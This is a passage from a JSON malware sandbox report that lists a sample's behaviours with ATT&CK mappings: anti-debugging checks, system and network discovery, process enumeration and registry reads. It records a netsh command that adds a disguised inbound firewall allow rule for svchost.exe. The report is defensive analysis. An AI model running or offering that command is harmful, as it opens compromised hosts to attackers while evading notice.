SystemProcessInformation at 00000000-00002972-00000105-121601 [PID: 2972]", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "module-16", "type": 10, "relevance": 3, "name": "Loads the debugger/analysis tool module", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6F220000\n \"ulhofeim.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6F220000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6F220000", "origin": "Loaded Module", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-10", "type": 6, "relevance": 6, "name": "Queries kernel debugger information", "description": "\"netsh.exe\" at 00000000-00002340-00000105-7110813", "origin": "API Call", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-39", "type": 6, "relevance": 8, "name": "Queries volume information of an entire harddrive", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" queries volume information of \"C:\\\" at 00000000-00002544-0000010C-1161350\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" queries volume information of \"C:\\\" at 00000000-00002544-0000010C-1162582\n \"ulhofeim.exe\" queries volume information of \"C:\\\" at 00000000-00002944-0000010C-2505372\n \"ulhofeim.exe\" queries volume information of \"C:\\\" at 00000000-00002944-0000010C-2507009\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002972-0000010C-51651\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002972-0000010C-1173954\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002972-0000010C-1780549\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002972-0000010C-1782383", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c5c377743793375ffffffff0c0000004c6237771f793375ffffffff0c00000064ec120004000000000400000100000078ec12000a0e170000000000 (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b203100690600000088ea2977ecf91200b344fe6988000000000000000000000000000000000000000000000000000000880000000000000000000000000000002c6b4000b3e841b1bcf51200616b400088000000f822410081a82977ecf9120000009001006ea6000002000008000000c62a5f00 (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb65750822690000e0fd7f9a5c397700d0fd7fb0c95e0144e0fd7f00000000400000003f0000002500000000e0fd7fa4c95e01c15c3977608240772500000000e0fd7f9a5c397700d0fd7fc8c95e01578938778083407713173475d8eb6575 (UID: 00000000-00002544)\n \"sc.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000589d3500b4fb3200145c3877435c387780fc320001000000940133000100000034fb3200935c397740834077d4a03877c8266b7780fc32000100000001000000c0e435000000000004fb320034fb3200a0fb320095e1347704d96100feffffffd4a038771bbe33750000707500000000 (UID: 00000000-00003996)\n \"ulhofeim.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000060dc1b003cfc3800145c3877435c387708fd3800010000009401190001000000bcfb3800935c397740834077d4a038771717617708fd38000100000001000000082a1c00000000008cfb3800bcfb380028fc380095e1347753e86100feffffffd4a038771bbe33750000707500000000 (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c5c377743793375ffffffff0c0000004c6237771f793375ffffffff0c00000064ec120004000000000400000100000078ec12000a0e290000000000 (UID: 00000000-00002944)\n \"netsh.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002340)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" queries volume information of \"C:\\\" at 00000000-00002544-0000010C-1161350\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" queries volume information of \"C:\\\" at 00000000-00002544-0000010C-1162582\n \"ulhofeim.exe\" queries volume information of \"C:\\\" at 00000000-00002944-0000010C-2505372\n \"ulhofeim.exe\" queries volume information of \"C:\\\" at 00000000-00002944-0000010C-2507009\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002972-0000010C-51651\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002972-0000010C-1173954\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002972-0000010C-1780549\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002972-0000010C-1782383", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"cmd.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003068)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-225", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve the host name of a computer", "description": "\"svchost.exe\" called \"gethostname\" with parameter %OSUSER%-PC & 128 (UID: 00000000-00002972)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00002544)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001200780e8e00fce2120080f47a7500008e000000000089f47a750187a3b00200000070e312006ce3120064e2120068e2120018e4120095e134770fab6100c0e21200c83a847534e31200d58c7c7570e3120004e3120042a47a75a802847544e31200d2f47a75080000006ef57a7544f57a75b986a3b00200000070aa226f0000130026bb226f18e31200020000000000130070aa226f48e3120042a47a75a80284758ce3120010a9226f08000000e6a8226f1ed041b10200000070aa226f0000130026bb226fac0e8e00780e8e0058e3120080502e6f18e41200f9f2266f7a9b71de (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000055168e8c0300000044e55e0153f90db0c00c00008ce55e01c0e45e01590000000300000048e45e0150e45e0118e65e01d0bbff69678d52dbfeffffff98e55e01bfe5fe6955168e8c98e55e01cce5fe69060000000000356a01000000dfe5fe693333ff040600000002000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f4e55e01000000008e00000044e65e01feffffffcce55e01cf003977d6003977d35207768e0000004700000044e65e0100000000a0e55e010000000008e65e01 (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360071e50db744de5e016d82ef754c62690004010000 (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000320033003200650030003500310062003500660063006300370062006500320062006400340037003700610038006400640064003800650039006100350030006300660066006400370038003600370036006100630032006400360031003900390064002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2b3877ef7f0776d8eb6575ac0161000000610000000000000000000400e800c9000000000000000000000000000000000000000500e300c900000000000000000000000870610000000000200000000000000000000000 (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000610018876b00000000003e00003e340000c040896b00b89c6b0038126800f0010000000061000400000018876b00acee5e010464387738016100e0633877b3590776000000000000610020876b006dd1297732e6ecb16caeca750000000000000000f0010000b89c6b00d82f61000100000000006100500161000c00000020876b00d82f6100020000021800000066220044820000000000000000000000030000004cee5e01820000007f070000000000006622004402000000c0753177b89c6b0000000000c075317768ee5e01e830610000000000d82f6100c0ee5e01ff2b3877 (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000003a6699d60300000044e55e0153f90db0c41100008ce55e01c0e45e015b0000000300000048e45e0150e45e0118e65e01d0bbff69678d52dbfeffffff98e55e01bfe5fe693a6699d698e55e01cce5fe69820500000000356a01000000dfe5fe693333ff048205000003000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006100f0ac6b00000000003e00003e340000c018af6b00c8e9680090b26b00f00100000000610004000000f0ac6b00acee5e010464387738016100e0633877b35907760000000000006100f8ac6b006dd1297732e6ecb16caeca750000000000000000fc000000c8e96800d82f61000100000000006100500161000c000000f8ac6b00d82f610002000002180000000d03000e820000000000000000000000030000004cee5e01820000008d02000000000000f22700d502000000c075317758806c0000000000c075317768ee5e014c30610000000000d82f6100c0ee5e01ff2b3877 (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000afc3ccc90300000044e55e0153f90db02c1200008ce55e01c0e45e015b0000000300000048e45e0150e45e0118e65e01d0bbff69678d52dbfeffffff98e55e01bfe5fe69afc3ccc998e55e01cce5fe69820500000000356a01000000dfe5fe693333ff048205000004000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00002544)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetForegroundWindow\" (UID: 00000000-00002544)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"IsWow64Process\" with parameter \"2544\" - (UID: 00000000-00002544)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\NETSH.EXE\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\NETSH.EXE\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC.EXE\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC.EXE\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"sc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"ulhofeim.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"netsh.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00002340)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-39", "type": 1, "relevance": 10, "name": "Makes a code branch decision directly after an API that is environment aware", "description": "Found API call GetTimeZoneInformation@KERNEL32.DLL directly followed by \"cmp eax, 02h\" and \"jne 0040B33Dh\" at 00000000-00002544-8597-269-0040B211\n Found API call GetTimeZoneInformation@KERNEL32.DLL directly followed by \"cmp eax, 02h\" and \"jne 0040B33Dh\" at 00000000-00002944-14610-273-0040B211", "origin": "Hybrid Analysis Technology", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"netsh.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002340)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"FindFirstFileW\" with parameter C:\\cmd.* (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\cmd.* (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"FindNextFileW\" with parameter cmd.exe (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"FindFirstFileW\" with parameter C:\\sc.* (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\sc.* (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"FindNextFileW\" with parameter sc.exe (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"FindFirstFileW\" with parameter C:\\netsh.* (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\netsh.* (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"FindNextFileW\" with parameter netsh.exe (UID: 00000000-00002544)\n \"cmd.exe\" called \"FindFirstFileW\" with parameter C:\\ (UID: 00000000-00003068)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"netsh.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-153", "type": 6, "relevance": 5, "name": "Calls an API typically used to retrieves adapter information", "description": "\"svchost.exe\" called \"GetAdaptersInfo\" with parameter \"000000000c0000007b30374234314637392d314145432d343738322d413645382d3843323846464241333545447d000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000496e74656c2852292050524f2f31303030204d54204e6574776f726b20436f6e6e656374696f6e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000600000042406c486f5d00000c000000060000000100000000000000000000003139322e3136382e302e3200000000003235352e3235352e3235352e30000000c0a80002000000003139322e3136382e302e3100000000003235352e3235352e3235352e32353500c0a80001000000003139322e3136382e302e3100000000003235352e3235352e3235352e32353500c0a800010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000008c2dee676833ee670000000000000000\" - (UID: 00000000-00002972)", "origin": "API Call", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"cmd.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"sc.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"ulhofeim.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"ulhofeim.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"netsh.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-170", "type": 6, "relevance": 5, "name": "Calls an API typically used to retrieve the current status of the specified service", "description": "\"sc.exe\" called \"QueryServiceStatusEx\" with parameters {\"hService\": \"3661d0\"\n \"InfoLevel\": \"0\"\n \"lpBuffer\": \"1506444\"\n \"cbBufSize\": \"36\"\n \"pcbBytesNeeded\": \"36\"}", "origin": "API Call", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"netsh.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00002340)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "target-186", "type": 9, "relevance": 2, "name": "Detects NETSH process execution", "description": "Process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00002340)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-38", "type": 7, "relevance": 3, "name": "Uses HTTPS for communication", "description": "HTTPS traffic to \"<IPv4>\" on port \"443\"\n HTTPS traffic to \"<IPv4>\" on port \"443\"", "origin": "Network Traffic", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" opened \"\\Device\\KsecDD\"\n \"netsh.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"ulhofeim.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\NJRBICEI\"; Key: \"IMAGEPATH\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": 